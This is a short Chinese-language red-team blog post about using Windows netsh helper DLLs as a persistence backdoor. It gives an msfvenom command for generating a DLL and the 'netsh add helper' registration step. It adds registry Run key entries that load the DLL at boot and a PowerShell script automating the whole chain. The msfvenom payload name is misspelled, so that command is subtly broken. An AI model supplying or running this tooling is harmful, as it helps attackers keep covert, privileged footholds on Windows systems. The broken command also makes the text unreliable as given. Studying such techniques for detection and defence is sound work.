netsh后门
Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红色团队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。
通过msfvenom生成一个dll
msfvenom -p widnows/x64/exec CMD=calc.exe -f dll > test.dll
在受害机执行
netsh add helper <DLL_PATH>
之后netsh一运行就会加载DLL(加载完DLL后自动运行netsh,关闭之后。再此之后执行的netsh都会加载dll)
如果要实现启动系统自动运行netsh,得修改注册表
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';
这里我用powershell实现了一个简单的功能
param (
[string]$path = "NULL"
)
if($path -eq "NULL"){
Write-Host "netsh.ps1 -path <DLL_path>";
exit(0);
}else{
write-host "[*] reboot run netsh";
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';
netsh add helper $path;
}
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:netsh后门
本文作者:九世
发布时间:2019-11-08, 23:45:13
最后更新:2019-11-08, 23:58:13
原始链接:http://jiushill.github.io/posts/b31575cf.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。